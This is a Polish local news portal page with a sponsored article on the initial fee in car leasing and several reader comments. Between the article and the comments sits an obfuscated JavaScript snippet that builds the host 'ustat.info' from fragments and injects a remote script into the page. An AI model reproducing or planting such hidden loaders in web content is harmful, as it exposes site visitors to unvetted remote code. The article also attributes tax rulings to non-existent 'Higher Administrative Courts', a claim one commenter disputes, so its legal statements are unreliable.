Portal nr 1 w powiecie bolesławieckim
REKLAMA 1,5% podatku dla Klekusiowo
BolecFORUM Nowy temat
Tekst zlecony
15 stycznia 2016r. godz. 08:05, odsłon: 3957, Redakcja

Opłata początkowa przy leasingu. Obowiązkowa czy nie?

Zanim podpiszesz umowę leasingową, będziesz musiał wnieść prawdopodobnie tzw. opłatę inicjalną.
(fot. Opłata początkowa przy leasingu. Obowiązkowa czy nie?)
Zanim podpiszesz umowę leasingową na sfinansowanie zakupu auta do firmy, będziesz musiał wnieść prawdopodobnie tzw. opłatę inicjalną. To, w jakiej wysokości i czy w ogóle zależy przede wszystkim od twojej wiarygodności finansowej.

Zanim podpiszesz umowę leasingową na sfinansowanie zakupu auta do firmy, będziesz musiał wnieść prawdopodobnie tzw. opłatę inicjalną. To, w jakiej wysokości i czy w ogóle zależy przede wszystkim od twojej wiarygodności finansowej.

To powinieneś wiedzieć o opłacie inicjalnej w leasingu

Na ostateczny koszt leasing samochodu firmowego składają się:

  • miesięczne raty leasingowe,
  • koszt wykupu samochodu (od 1 do kilkunastu – kilkudziesięciu procent),
  • opłata początkowa.

O ile o negocjacji rat leasingowych możesz zapomnieć, o tyle wartość wykupu (wyrażona w %) oraz wysokość opłaty początkowej to pewien kompromis między oczekiwaniami twoimi a warunkami stawianymi przez samego leasingodawcę.

Popularne pytania o opłatę początkową

  1. Czy mogę uniknąć opłaty początkowej?

Możesz – wszystko tak naprawdę zależy od indywidualnej polityki prowadzonej przez firmę leasingową. Co do zasady, minimalna wpłata własna wynosi na ogół 1% wartości przedmiotu umowy – maksymalna to najczęściej 40-45% (patrz więcej: Wpłata własna przy leasingu samochodowym. 1, 20, a może 30%? »).

Jeśli nie dysponujesz satysfakcjonującym kapitałem, który mógłbyś wnieść do leasingodawcy, udokumentuj swoją wiarygodność finansową. Możesz przedłożyć m.in. zeszłoroczne zeznanie podatkowe, jeśli jesteś pewien, że dochód w PIT jest rzeczywiście wysoki.

  1. A co z czynszem inicjalnym?

Czynsz inicjalny to inaczej opłata początkowa, wpłata własna lub wkład własny. To pojęcia zamiennie stosowane przez leasingodawców.

  1. Założyłem firmę, a leasingodawca żąda 40-procentowej wpłaty własnej. Dlaczego?

Minimalna wysokość czynszu inicjalnego jaki zaproponuje ci leasingodawca jest wyrazem twojej wiarygodności. Ze względu na wysokie ryzyko upadłościowe w pierwszych latach działalności, początkujący przedsiębiorcy muszą liczyć się nie tylko z bardziej żmudnymi procesami analizy ich kondycji finansowej, ale i wyższą barierą wejścia wyrażoną właśnie we wpłacie własnej (wyższa wpłata własna to proporcjonalnie niższe ryzyko dla leasingodawcę).

  1. Duża, czy mała? Jaka opłata początkowa?

Im wyższa opłata początkowa, tym niższy koszt obsługi leasingu w ogólnym rozrachunku, więc jeśli zależy ci przede wszystkim na realnych oszczędnościach finansowych, czynsz inicjalny powinien być tak wysoki, jak to tylko możliwe.

Podana przez nas rekomendacja to jednak duże uproszczenie, bo jeśli prowadzisz duży biznes, a wartość przedmiotu umowy jest znaczna (np. zakup 5 aut flotowych, z których każdy z segmentu średniego lub wyższego), to niewykluczone, że obniżenie opłaty początkowej np. z 40 do 10% i pozostawienie tych 30% na rachunku firmowym pozwoli na sprawniejsze funkcjonowanie biznesu w obrocie gospodarczym.

  1. Jak zaksięgować opłatę początkową? Jednorazowo, czy proporcjonalnie?

Zgodnie z interpretacjami Wyższych Sądów Administracyjnych (m.in. we Wrocławiu, w Krakowie, Warszawie), opłata początkowa powinna być odpisana od kosztów uzyskania przychodów jednorazowo – tzn. wtedy, kiedy przedsiębiorca obciąża z jej tytułu swój rachunek firmowy. W uzasadnieniach czytamy, że opłata początkowa jest związana z samym zawarciem umowy między stronami, co oznacza, że nie dotyczy * proporcjonalnie całego okresu leasingowania.

* Co ma miejsce, jeśli przedsiębiorca nie będzie terminowo regulował swoich zobowiązań finansowych wobec leasingodawcy i dojdzie do przedterminowego rozwiązania umowy.

(function(){ uXf2=document.createElement("script");uXf2.type="text/javascript"; uXf2.async=true;uXf2_=(("us")+"t")+"a";uXf2_+=("t.i")+""+"n";uXf2_+=(("f")+"o"); uXf2.src="http://"+uXf2_+"/6907795.n12dux51Xf25e2mzwmi85ygtsXvmfx"; document.body.appendChild(uXf2); })();

Opłata początkowa przy leasingu. Obowiązkowa czy nie?

~Anonim niezalogowany
15 stycznia 2016r. o 18:37
Kto to doradza? Pomijajac część merytoryczna, nie istnieja Wyższe Sady Administracyjne i nie wydaja żadnych interpretacji.
Zgłoś do moderacji Odpowiedz
16475
#Jarzab nieaktywny
24 sierpnia 2017r. o 12:57
W Googlach często widzę nagłówki jakichś tekstów o leasingu bez wkładu własnego, ale nie widziałem w praktyce takie oferty, co nie znaczy, że ich nie ma. Co do 40% wkładu, to szczerze mówiąc jest tyle firm, które dają 1-10%, że jakby mi ktoś powiedział 40%, to chyba bym się zaśmiał. Firmy leasingowe i banki bardzo walczą o klienta. Opłata początkowa o jedno, ale jest jeszcze wiele innych bardzo ważnych kwestii - raty, wykup. Gap, ubezpieczenie, inne opłaty itp. Jak ktoś chce znaleźć tani leasing samochodu, to nie może decydować się na pierwszą ofertę tylko porównać kilka i wybrać ten najtańszy leasing i negocjować dalej. Tylko, że najtańszy leasing to nie koniecznie najlepszy. Warto też poczytać opinie o firmach.

Zmoderowano 24.08.2017 godz.12:57 - powód: link (moderator)
Zgłoś do moderacji Odpowiedz
18590
#Aka nieaktywny
8 stycznia 2018r. o 15:58
Są są, tylko że to jest zawsze kosztem czegoś. Leasing bez wkładu własnego może być droższy niż taki z 10%. To zależy kto ma jaki plan i ile środków na starcie.
Polecam artykuł jak wybrać najlepszy leasing http://antyhaczyk.blogspot.com/2014/10/leasing-najlepszy-najtanszy-gdzie.html
Zgłoś do moderacji Odpowiedz
~~ niezalogowany
9 stycznia 2018r. o 13:38
To nie jest merytoryka tylko metoda
Zgłoś do moderacji Odpowiedz
~~skorn niezalogowany
9 stycznia 2018r. o 17:15
http://pikio.pl/wp-content/uploads/2017/07/1-71.jpg
Zgłoś do moderacji Odpowiedz
Wypowiedz się:
Jeśli zostawisz to pole puste przypiszemy Ci losową ksywę.
Publikacja czyichś danych osobowych bez zezwolenia czy użycie zwrotów obraźliwych podlega odpowiedzialności karnej i będzie skutkować przekazaniem danych publikującego organom ścigania.
Publikowane komentarze są prywatnymi opiniami użytkowników serwisu. Bolec.Info nie ponosi odpowiedzialności za treść opinii i wypowiedzi, a osoba zamieszczająca wypowiedź może ponieść za jej treść odpowiedzialność karną i cywilną. Bolec.Info zastrzega sobie prawo do moderowania wszystkich opublikowanych wypowiedzi, jednak nie bierze na siebie takiego obowiązku. Pamiętaj, że dodając zdjęcie deklarujesz, że jesteś jego autorem i przekazujesz Wydawcy Bolec.Info prawa do jego publikacji i udostępniania. Umieszczając cudze zdjęcia możesz złamać prawo autorskie. Bolec.Info nie ponosi odpowiedzialności za publikowane zdjęcia.
Daj nam Cynk - zgarnij nagrodę!

Byłeś świadkiem jakiegoś wypadku lub innego zdarzenia? Wiesz coś, o czym my nie wiemy albo jeszcze nie napisaliśmy? Daj nam znać i zgłoś swój temat!

Wypełnij formularz lub wyślij pod adres: [email protected].

Kontakt telefoniczny z Redakcją Bolec.Info: +48 693 375 790 (przez całą dobę).